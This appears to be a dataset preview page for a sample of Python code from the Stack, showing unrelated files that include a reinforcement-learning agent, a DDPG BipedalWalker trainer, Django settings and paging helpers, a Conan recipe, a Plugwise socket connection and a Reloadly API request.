print(intersection_extra_space(a, b))
print(intersection(a, b)) |
from dataclasses import astuple
import agent
import numpy as np
import torch
import torch.nn as nn
from agent import NNBase
from gym import Space
from gym.spaces import Box, Dict, Discrete, MultiDiscrete
from my.env import Obs
from transformers import CLIPModel
from utils import init
def get_size(space: Space):
if isinstance(space, (Box, MultiDiscrete)):
return int(np.prod(space.shape))
if isinstance(space, Discrete):
return 1
raise TypeError()
class Agent(agent.Agent):
def __init__(self, observation_space, **kwargs):
spaces = Obs(**observation_space.spaces)
super().__init__(
obs_shape=spaces.image.shape, observation_space=observation_space, **kwargs
)
def build_base(self, obs_shape, **kwargs):
return Base(**kwargs)
class ResidualBlock(nn.Module):
def __init__(self, channels: int):
super().__init__()
self.net = nn.Sequential(
nn.ReLU(),
nn.Conv2d(
channels, channels, kernel_size=(3, 3), stride=(1, 1), padding="same"
),
nn.ReLU(),
nn.Conv2d(
channels, channels, kernel_size=(3, 3), stride=(1, 1), padding="same"
),
)
def forward(self, x):
return x + self.net(x)
class Base(NNBase):
def __init__(
self,
clip: bool,
gpt_embeddings: bool,
hidden_size: int,
image_size: int,
observation_space: Dict,
recurrent: bool,
large_architecture: bool,
train_ln: bool,
train_wpe: bool,
):
self.observation_spaces = Obs(**observation_space.spaces)
if gpt_embeddings:
*_, self.mission_size = self.observation_spaces.mission.shape
else:
self.mission_size = 2048
super().__init__(
recurrent=recurrent,
recurrent_input_size=image_size + self.mission_size,
hidden_size=hidden_size,
)
self.clip = clip
self.train_wpe = train_wpe
self.train_ln = train_ln
self.embeddings = None if gpt_embeddings else self.build_embeddings()
image_shape = self.observation_spaces.image.shape
d, h, w = image_shape
if clip:
self.clip: CLIPModel = CLIPModel.from_pretrained(
"openai/clip-vit-base-patch32"
)
for name, p in self.clip.vision_model.named_parameters():
requires_grad = (self.train_wpe and "position_embedding" in name) or (
self.train_ln and "layer_norm" in name
)
p.requires_grad_(requires_grad)
else:
def get_image_net():
prev = d
if not large_architecture:
for (num_ch, kernel_size, stride) in [
(16, 8, 4),
(32, 4, 2),
]: # Downscale.
yield nn.Conv2d(
prev, num_ch, kernel_size=kernel_size, stride=stride
)
yield nn.ReLU()
prev = num_ch
else:
for (num_ch, num_blocks) in [
(16, 2),
(32, 2),
(32, 2),
]: # Downscale.
yield nn.Conv2d(prev, num_ch, kernel_size=(3, 3), stride=(1, 1))
yield nn.MaxPool2d(
kernel_size=(3, 3),
stride=[2, 2],
)
# Residual block(s).
for _ in range(num_blocks):
yield ResidualBlock(num_ch)
prev = num_ch
yield nn.ReLU()
yield nn.Flatten()
self._image_net = nn.Sequential(*get_image_net())
dummy_input = torch.zeros(1, d, h, w)
output = self.image_net(dummy_input)
self.image_linear = nn.Sequential(
nn.Linear(output.size(-1), image_size), nn.ReLU()
)
self._hidden_size = hidden_size
self._recurrent = recurrent
self.initial_hxs = nn.Parameter(self._initial_hxs)
init_ = lambda m: init(
m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0)
)
self.critic_linear = init_(nn.Linear(hidden_size, 1))
def image_net(self, image: torch.Tensor):
if self.clip:
state = self.clip.vision_model(pixel_values=image).last_hidden_state
return state.mean(1)
return self._image_net(image)
def build_embeddings(self):
num_embeddings = self.observation_spaces.mission.high.max()
return nn.EmbeddingBag(int(num_embeddings) + 1, self.mission_size)
def embed(self, inputs):
if self.embeddings is not None:
return self.embeddings.forward(inputs.long())
return inputs
def forward(self, inputs, rnn_hxs, masks):
inputs = Obs(
*torch.split(
inputs,
[get_size(space) for space in astuple(self.observation_spaces)],
dim=-1,
)
)
image = inputs.image.reshape(-1, *self.observation_spaces.image.shape)
image = self.image_net(image)
image = self.image_linear(image)
mission = inputs.mission.reshape(-1, *self.observation_spaces.mission.shape)
n, l, e = mission.shape
flattened = mission.reshape(n * l, e)
states = self.embed(flattened)
states = states.reshape(n, l, -1)
mission = states.mean(1)
x = torch.cat([image, mission], dim=-1)
assert self.is_recurrent
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
|
import argparse
import os
import sys
import zipfile
def parse_args(args_list):
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='install cudnn')
parser.add_argument('zipfile', help='downloaded cudnn zip file')
args = parser.parse_args(args_list)
return args
def main(args_list):
args = parse_args(args_list)
print('Installing cudnn...')
with zipfile.ZipFile(args.zipfile, 'r') as zf:
zf.extractall('cudnn')
print('Done.')
if __name__ == '__main__':
main(sys.argv[1:])
|
"""Configuring Django Mutadi app for Heroku"""
import django_heroku
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from .base import *
SECRET_KEY = os.environ["DJANGO_SECRET_KEY"]
DEBUG = False
ALLOWED_HOSTS = [os.environ["DJANGO_ALLOWED_HOSTS"]]
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
SECURE_HSTS_SECONDS = 15768000
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_PRELOAD = True
SECURE_BROWSER_XSS_FILTER = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
SECURE_SSL_REDIRECT = True
sentry_sdk.init(
dsn=os.environ["SENTRY_DSN"],
integrations=[DjangoIntegration()],
traces_sample_rate=1.0,
# If you wish to associate users to errors (assuming you are using
# django.contrib.auth) you may enable sending PII data.
send_default_pii=True,
)
# Activate Django-Heroku.
django_heroku.settings(locals())
|
import os
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
required_conan_version = ">=1.33.0"
class LibBasisUniversalConan(ConanFile):
name = "libbasisu"
description = "Basis Universal Supercompressed GPU Texture Codec"
homepage = "https://github.com/BinomialLLC/basis_universal"
topics = ("conan", "basis", "textures", "compression")
url = "https://github.com/conan-io/conan-center-index"
license = "Apache-2.0"
exports_sources = ["CMakeLists.txt", "patches/*"]
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
options = {
"fPIC": [True, False],
"shared": [True, False],
"use_sse4": [True, False],
"with_zstd": [True, False],
"enable_encoder": [True, False],
"custom_iterator_debug_level": [True, False]
}
default_options = {
"fPIC": True,
"shared": False,
"use_sse4": False,
"with_zstd": True,
"enable_encoder": True,
"custom_iterator_debug_level": False
}
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def _use_custom_iterator_debug_level(self):
return self.options.get_safe("custom_iterator_debug_level", default=self.default_options["custom_iterator_debug_level"])
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
if self.settings.compiler != "Visual Studio":
del self.options.custom_iterator_debug_level
def _minimum_compiler_version(self) -> bool:
return {
"Visual Studio": "15",
"gcc": "5.4",
"clang": "3.9",
"apple-clang": "10"
}
def validate(self):
min_version = self._minimum_compiler_version().get(str(self.settings.compiler))
if not min_version:
self.output.warn("{} recipe lacks information about the {} compiler support.".format(
self.name, self.settings.compiler))
elif tools.Version(self.settings.compiler.version) < min_version:
raise ConanInvalidConfiguration("{} {} does not support compiler with version {} {}, minimum supported compiler version is {} ".format(self.name, self.version, self.settings.compiler, self.settings.compiler.version, min_version))
if self.settings.compiler.get_safe("cppstd"):
tools.check_min_cppstd(self, 11)
def configure(self):
if self.options.shared:
del self.options.fPIC
def source(self):
tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions["SSE4"] = self.options.use_sse4
self._cmake.definitions["ZSTD"] = self.options.with_zstd
self._cmake.definitions["ENABLE_ENCODER"] = self.options.enable_encoder
self._cmake.definitions["NO_ITERATOR_DEBUG_LEVEL"] = not self._use_custom_iterator_debug_level()
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
self.copy("*.h", dst=os.path.join("include", self.name, "transcoder"), src=os.path.join(self._source_subfolder, "transcoder"))
if self.options.enable_encoder:
self.copy("*.h", dst=os.path.join("include", self.name, "encoder"), src=os.path.join(self._source_subfolder, "encoder"))
self.copy(pattern="*.a", dst="lib", keep_path=False)
self.copy(pattern="*.so", dst="lib", keep_path=False)
self.copy(pattern="*.dylib*", dst="lib", keep_path=False)
self.copy(pattern="*.lib", dst="lib", keep_path=False)
self.copy(pattern="*.dll", dst="bin", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.names["cmake_find_package"] = self.name
self.cpp_info.names["cmake_find_package_multi"] = self.name
self.cpp_info.includedirs = ["include", os.path.join("include", self.name)]
if self.settings.os == "Linux":
self.cpp_info.system_libs = ["m", "pthread"]
self.cpp_info.defines.append("BASISU_NO_ITERATOR_DEBUG_LEVEL={}".format("1" if self._use_custom_iterator_debug_level() else "0"))
|
from core import MLPActorCritic
import numpy as np
import torch
from torch.distributions import Normal
import torch.nn as nn
from torch.nn.modules import activation
from torch.nn import MSELoss
from torch.optim import Adam
import gym
import math
from skimage.transform import resize
from copy import deepcopy
# BipedalWalker-v3
pi_lr = 1e-3
qf_lr = 1e-3
# LunarLanderContinuous-v2
env = gym.make('BipedalWalker-v3').unwrapped
action_dim = env.action_space.shape[0]
state_dim = env.observation_space.shape[0]
act_limit = env.action_space.high[0]
episode_steps_num = 4000
episode_iters_num = 1000
max_steps_per_game = 500
train_iters_num = 50
clip_ratio = 0.2
height = 100
width = 100
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
device = 'cpu'
target_kl = 0.01
print('workon', device)
gamma = 0.99
polyak = 0.99
update_after = 1000
print(act_limit)
print(state_dim)
print(action_dim)
class Buffer:
def __init__(self, state_dim, action_dim, capactiy):
self.states = np.zeros((capactiy, state_dim))
self.next_states = np.zeros((capactiy, state_dim))
self.actions = np.zeros((capactiy, action_dim))
self.rewards = np.zeros(capactiy)
self.dones = np.zeros(capactiy)
self.capactiy = capactiy
self.current_index = 0
self.current_size = 0
def store(self, state, next_state, action, reward, done):
self.states[self.current_index] = state
self.next_states[self.current_index] = next_state
self.actions[self.current_index] = action
self.rewards[self.current_index] = reward
self.dones[self.current_index] = done
self.current_index = (self.current_index + 1) % self.capactiy
self.current_size = min(self.current_size + 1, self.capactiy)
def __len__(self):
return len(self.memory)
def batch(self, batch_size=128):
assert batch_size <= self.current_size
indexs = np.random.randint(0, self.current_size, size=batch_size)
batch = {'states': self.states[indexs],
'next_states': self.next_states[indexs],
'actions': self.actions[indexs],
'rewards': self.rewards[indexs],
'dones': self.dones[indexs]}
return batch
class Mlp(nn.Module):
def __init__(self, state_dim, action_dim, mid_n, out_activation=nn.Identity) -> None:
super().__init__()
self.net = nn.Sequential(nn.Linear(state_dim, mid_n), nn.ReLU(),
nn.Linear(mid_n, mid_n), nn.ReLU(),
nn.Linear(mid_n, mid_n), nn.ReLU(),
nn.Linear(mid_n, action_dim), out_activation())
def forward(self, x):
return self.net(x)
class Agent:
def __init__(self, state_dim, action_dim) -> None:
self.pi = Mlp(state_dim, action_dim, 64, nn.Tanh)
self.qf = Mlp(state_dim + action_dim, 1, 64)
self.pi_target = deepcopy(self.pi)
self.qf_target = deepcopy(self.qf)
# for p in self.pi_target.parameters():
# p.requires_grad = False
# for p in self.qf_target.parameters():
# p.requires_grad = False
self.pi_optim = Adam(self.pi.parameters(), lr=pi_lr)
self.qf_optim = Adam(self.qf.parameters(), lr=qf_lr)
# # Create actor-critic module and target networks
# self.ac = MLPActorCritic(env.observation_space, env.action_space)
# self.ac_targ = deepcopy(self.ac)
# # Freeze target networks with respect to optimizers (only update via polyak averaging)
# for p in self.ac_targ.parameters():
# p.requires_grad = False
# self.pi_optim = Adam(self.ac.pi.parameters(), lr=pi_lr)
# self.qf_optim = Adam(self.ac.q.parameters(), lr=qf_lr)
def step(self, state, noise_scale):
with torch.no_grad():
state = torch.FloatTensor(state)
action = act_limit * self.pi(state).numpy()
action += noise_scale * np.random.randn(action_dim)
# action = self.ac.act(torch.as_tensor(state, dtype=torch.float32))
# action += noise_scale * np.random.randn(action_dim)
return np.clip(action, -act_limit, act_limit)
def learn(self, batch):
states = torch.FloatTensor(batch['states'])
next_states = torch.FloatTensor(batch['next_states'])
actions = torch.FloatTensor(batch['actions'])
rewards = torch.FloatTensor(batch['rewards'])
dones = torch.BoolTensor(batch['dones'])
q_value = self.qf(torch.cat([states, actions], dim=-1))
with torch.no_grad():
q_next_value = self.qf_target(torch.cat([next_states, self.pi_target(next_states)], dim=-1))
q_next_value[dones] = 0
q_target_value = rewards.unsqueeze(-1) + gamma * q_next_value
qf_loss = MSELoss()(q_target_value, q_value)
self.qf_optim.zero_grad()
qf_loss.backward()
self.qf_optim.step()
# frezee qf param
for param in self.qf.parameters():
param.requires_grad = False
pi_loss = -self.qf(torch.cat([next_states, self.pi(next_states)], dim=-1)).mean()
self.pi_optim.zero_grad()
pi_loss.backward()
self.pi_optim.step()
for param in self.qf.parameters():
param.requires_grad = True
with torch.no_grad():
for param, param_target in zip(self.qf.parameters(), self.qf_target.parameters()):
param_target.data.mul_(polyak)
param_target.data.add_((1 - polyak) * param.data)
for param, param_target in zip(self.pi.parameters(), self.pi_target.parameters()):
param_target.data.mul_(polyak)
param_target.data.add_((1 - polyak) * param.data)
# self.qf_target.load_state_dict(self.qf.state_dict())
# self.pi_target.load_state_dict(self.pi.state_dict())
return pi_loss.item(), qf_loss.item()
agent = Agent(state_dim, action_dim)
buffer = Buffer(state_dim, action_dim, int(1e6))
pi_loss_list = []
qf_loss_list = []
return_list = []
for episode_i in range(episode_iters_num):
state = env.reset()
total_reward = 0
step_index = 0
for step_i in range(episode_steps_num):
action = agent.step(state, 0.3)
next_state, reward, done, _ = env.step(action)
if(step_index == max_steps_per_game - 1):
done = True
# reward = -100
buffer.store(state, next_state, action, reward, done)
state = next_state
total_reward += reward
step_index += 1
if done:
state = env.reset()
return_list.append(total_reward)
total_reward = 0
step_index = 0
if step_i >= update_after and step_i % train_iters_num == 0:
for i in range(train_iters_num):
pi_loss, qf_loss = agent.learn(buffer.batch())
pi_loss_list.append(pi_loss)
qf_loss_list.append(qf_loss)
if(episode_i % 40 == 0 and episode_i != 0):
state = env.reset()
total_reward = 0
for step_i in range(max_steps_per_game):
action = agent.step(state, 0)
state, reward, done, _ = env.step(action)
env.render()
if(step_index == max_steps_per_game - 1):
done = True
total_reward += reward
if done:
print('test | return: {}'.format(total_reward))
break
if(episode_i % 1 == 0):
print('episode {}| pi_loss {} qf_loss {} return {}'.format(
episode_i,
format(np.mean(pi_loss_list), '.3f'),
format(np.mean(qf_loss_list), '.3f'),
format(np.mean(return_list), '.2f')))
pi_loss_list = []
qf_loss_list = []
return_list = []
|
from django.conf import settings
from . import models
def init_paging_details(page_number):
page_size = settings.PAGE_SIZE
start = (page_number - 1) * page_size
return models.PagingDetails(
page_number=page_number,
start_record=start,
end_record=start + page_size,
prev_page="",
next_page="",
)
def set_paging_links(paging, url):
number_of_items = paging.end_record - paging.start_record
if number_of_items >= settings.PAGE_SIZE:
paging.next_page = url + "?pageNo=" + str(paging.page_number + 1)
if paging.page_number > 1 :
paging.prev_page = url + "?pageNo=" + str(paging.page_number -1)
|
"""
Use of this source code is governed by the MIT license found in the LICENSE file.
Socket connection
"""
import time
import threading
import logging
from queue import Queue
import socket
from plugwise.constants import SLEEP_TIME
from plugwise.connections.connection import StickConnection
from plugwise.message import PlugwiseMessage
from plugwise.util import PlugwiseException
class SocketConnection(StickConnection):
"""
Wrapper for Socket connection configuration
"""
def __init__(self, device, stick=None):
StickConnection.__init__(self)
self.logger = logging.getLogger("plugwise")
self._device = device
self.stick = stick
# get the address from a <host>:<port> format
addr = device.split(":")
addr = (addr[0], int(addr[1]))
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect(addr)
except Exception:
self.logger.error(
"Could not open socket, \
no messages are read or written to the bus"
)
raise plugwiseException("Could not open socket port")
# build a read thread
self._listen_process = threading.Thread(
None, self.read_daemon, "plugwise-process-reader", (), {}
)
self._listen_process.daemon = True
self._listen_process.start()
# build a writer thread
self._write_queue = Queue()
self._write_process = threading.Thread(
None, self.write_daemon, "plugwise-connection-writer", (), {}
)
self._write_process.daemon = True
self._write_process.start()
def stop_connection(self):
"""Close the socket."""
self.logger.warning("Stop executed")
try:
self._socket.close()
except Exception:
self.logger.error("Error while closing socket")
raise plugwiseException("Error while closing socket")
time.sleep(1)
def feed_parser(self, data):
"""Parse received message."""
assert isinstance(data, bytes)
self.stick.feed_parser(data)
def send(self, message, callback=None):
"""Add message to write queue."""
assert isinstance(message, PlugwiseMessage)
self._write_queue.put_nowait((message, callback))
def read_daemon(self):
"""Read thread."""
while True:
data = self._socket.recv(9999)
self.feed_parser(data)
def write_daemon(self):
"""Write thread."""
while True:
(message, callback) = self._write_queue.get(block=True)
self.logger.info("Sending message on USB bus: %s", str(message))
self.logger.error("Sending binary message: %s", str(message.serialize()))
self._socket.send(message.serialize())
time.sleep(SLEEP_TIME)
if callback:
callback()
|
import requests
url = "https://giftcards.reloadly.com/reports/transactions?startDate=2021-06-01 00:00:00&endDate=2021-06-18 23:17:02"
payload={}
headers = {
'Authorization': 'Bearer eyJraXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
'Content-Type': 'application/json',
'Accept': 'application/com.reloadly.giftcards-v1+json'
}
response = requests.request("GET", url, headers=headers, data=payload)
print(response.text) |
End of preview. Expand
in Dataset Viewer.
Small Python Stack
This dataset contains a random sample of 20% of the Python code available in the original Stack.
- Downloads last month
- 56